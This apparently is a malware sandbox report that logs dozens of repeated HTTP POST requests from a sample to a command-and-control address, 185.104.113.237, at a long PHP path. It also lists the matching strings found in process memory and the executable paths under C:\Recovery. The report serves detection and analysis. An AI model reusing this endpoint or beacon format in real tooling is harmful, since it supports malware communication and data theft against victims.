                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1000Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1264Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 185.104.113.237
Content-Length: 1012
Expect: 100-continue
Source: global traffic
HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 185.104.113.237
Content-Length: 1008
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 185.104.113.237
Content-Length: 1292
Expect: 100-continue
Connection: Keep-Alive
Source: global traffic
HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 185.104.113.237
Content-Length: 1008
Expect: 100-continue
Source: global traffic
HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: 185.104.113.237
Content-Length: 1276
Expect: 100-continue
Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1264Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1292Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
Source: global traffic. HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1292 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic. HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1000 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic. HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1008 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic. HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1264 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic. HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1276 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1008Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 185.104.113.237Content-Length: 1012Expect: 100-continueConnection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1292 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1008 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1012 | Expect: 100-continue
                              Source: global traffic | HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1276 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global traffic | HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 1000 | Expect: 100-continue | Connection: Keep-Alive
                              Source: unknown | TCP traffic detected without corresponding DNS query: 185.104.113.237
                              Source: unknown | HTTP traffic detected: POST /Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmultiflower.php HTTP/1.1 | Content-Type: application/octet-stream | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 | Host: 185.104.113.237 | Content-Length: 336 | Expect: 100-continue | Connection: Keep-Alive
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002F75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.104.113.237
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.104.113.237/Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000003057000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002F75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.104.113.237/Image1/LinuxHttp/_/53secure/PhpLocal/externalRequestlow6/Cdn/Multi3Auth/Vmmul
                              Source: izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.000000000346A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://185.104H
                              Source: 4Osfx7gnSx.exe, 00000000.00000002.2005023300.00000000037BF000.00000004.00000800.00020000.00000000.sdmp, izvoheVaDbpPfPMLrEwQFH.exe, 00000006.00000002.4436962371.0000000002CF8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Process Stats: CPU usage > 49%
                              Source: C:\Users\user\Desktop\4Osfx7gnSx.exe | Code function: 0_2_00007FF848F20D98
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF848F10D98
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490E4AB0
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490DFC00
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490DAF0A
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490DC362
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490E0A35
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490E4ACA
                              Source: C:\Recovery\izvoheVaDbpPfPMLrEwQFH.exe | Code function: 6_2_00007FF8490E4ADD
